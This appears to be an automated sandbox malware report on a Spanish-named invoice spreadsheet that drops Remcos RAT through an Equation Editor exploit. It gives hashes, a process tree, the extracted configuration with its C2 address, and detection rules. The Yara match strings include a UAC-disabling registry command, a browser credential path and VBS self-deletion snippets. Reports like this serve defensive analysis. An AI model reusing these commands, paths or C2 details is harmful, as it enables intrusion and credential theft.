Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURA.xlsx

Overview

General Information

Sample name:FACTURA.xlsx
Analysis ID:1572126
MD5:0c7d9bbd0cfe3621f076aae883009e36
SHA1:58d9da251f4466a6cd9fb7fb7f0cbb196425db2e
SHA256:b326ee834d3e9c27a5712b91bf28ac789ea8f715dfd17cca0cd6d0cc5ef18c9f
Tags:xlsxuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3532 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3680 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • kudo.exe (PID: 3844 cmdline: "C:\Users\user\AppData\Local\Temp\kudo.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
        • outvaunts.exe (PID: 3860 cmdline: "C:\Users\user\AppData\Local\Temp\kudo.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
          • outvaunts.exe (PID: 3884 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
            • outvaunts.exe (PID: 3912 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
              • outvaunts.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                • outvaunts.exe (PID: 3932 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                  • outvaunts.exe (PID: 3940 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                    • outvaunts.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                      • outvaunts.exe (PID: 3960 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                        • outvaunts.exe (PID: 3972 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                          • outvaunts.exe (PID: 3980 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                            • outvaunts.exe (PID: 3988 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                              • outvaunts.exe (PID: 4036 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                • outvaunts.exe (PID: 4060 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                  • outvaunts.exe (PID: 4072 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                    • outvaunts.exe (PID: 4088 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                      • outvaunts.exe (PID: 3084 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                        • outvaunts.exe (PID: 3116 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                          • outvaunts.exe (PID: 3148 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                            • outvaunts.exe (PID: 3192 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                              • outvaunts.exe (PID: 3224 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                                • outvaunts.exe (PID: 3240 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                                  • outvaunts.exe (PID: 3260 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
  • wscript.exe (PID: 4000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • outvaunts.exe (PID: 4044 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
      • outvaunts.exe (PID: 4052 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
        • outvaunts.exe (PID: 4080 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
          • outvaunts.exe (PID: 2884 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
            • outvaunts.exe (PID: 3100 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
              • outvaunts.exe (PID: 3132 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                • outvaunts.exe (PID: 3164 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                  • outvaunts.exe (PID: 3176 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                    • outvaunts.exe (PID: 3208 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                      • outvaunts.exe (PID: 3272 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                        • outvaunts.exe (PID: 2504 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aaf8:$a1: Remcos restarted by watchdog!
        • 0x6b070:$a3: %02i:%02i:%02i:%03i
        00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64e04:$str_b2: Executing file:
        • 0x65c3c:$str_b3: GetDirectListeningPort
        • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65780:$str_b7: \update.vbs
        • 0x64e2c:$str_b9: Downloaded file:
        • 0x64e18:$str_b10: Downloading file:
        • 0x64ebc:$str_b12: Failed to upload file:
        • 0x65c04:$str_b13: StartForward
        • 0x65c24:$str_b14: StopForward
        • 0x656d8:$str_b15: fso.DeleteFile "
        • 0x6566c:$str_b16: On Error Resume Next
        • 0x65708:$str_b17: fso.DeleteFolder "
        • 0x64eac:$str_b18: Uploaded file:
        • 0x64e6c:$str_b19: Unable to delete:
        • 0x656a0:$str_b20: while fso.FileExists("
        • 0x65349:$str_c0: [Firefox StoredLogins not found]
        Click to see the 297 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        30.2.outvaunts.exe.1190000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          30.2.outvaunts.exe.1190000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            30.2.outvaunts.exe.1190000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              30.2.outvaunts.exe.1190000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6aaf8:$a1: Remcos restarted by watchdog!
              • 0x6b070:$a3: %02i:%02i:%02i:%03i
              30.2.outvaunts.exe.1190000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
              • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x64e04:$str_b2: Executing file:
              • 0x65c3c:$str_b3: GetDirectListeningPort
              • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x65780:$str_b7: \update.vbs
              • 0x64e2c:$str_b9: Downloaded file:
              • 0x64e18:$str_b10: Downloading file:
              • 0x64ebc:$str_b12: Failed to upload file:
              • 0x65c04:$str_b13: StartForward
              • 0x65c24:$str_b14: StopForward
              • 0x656d8:$str_b15: fso.DeleteFile "
              • 0x6566c:$str_b16: On Error Resume Next
              • 0x65708:$str_b17: fso.DeleteFolder "
              • 0x64eac:$str_b18: Uploaded file:
              • 0x64e6c:$str_b19: Unable to delete:
              • 0x656a0:$str_b20: while fso.FileExists("
              • 0x65349:$str_c0: [Firefox StoredLogins not found]
              Click to see the 391 entries

              Sigma Signatures

              Exploits

              barindex
              Sigma detected: File Dropped By EQNEDT32EXE
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3680, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe

              System Summary

              barindex
              Sigma detected: Equation Editor Network Connection
              Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 161.132.57.101, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3680, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
              Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
              Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Local\Temp\kudo.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\kudo.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\kudo.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\kudo.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\kudo.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\kudo.exe" , ProcessId: 3844, ProcessName: kudo.exe
              Sigma detected: Suspicious Microsoft Office Child Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Local\Temp\kudo.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\kudo.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\kudo.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\kudo.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\kudo.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\kudo.exe" , ProcessId: 3844, ProcessName: kudo.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , ProcessId: 4000, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , ProcessId: 4000, ProcessName: wscript.exe
              Sigma detected: Modification of IE Registry Settings
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3680, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\complacence\outvaunts.exe, ProcessId: 3860, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T07:04:57.871930+010020010463Misc activity161.132.57.101443192.168.2.2249163TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: FACTURA.xlsxAvira: detected
              Found malware configuration
              Source: 22.2.outvaunts.exe.800000.0.raw.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exeReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeReversingLabs: Detection: 57%
              Multi AV Scanner detection for submitted file
              Source: FACTURA.xlsxReversingLabs: Detection: 63%
              Source: FACTURA.xlsxVirustotal: Detection: 45%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
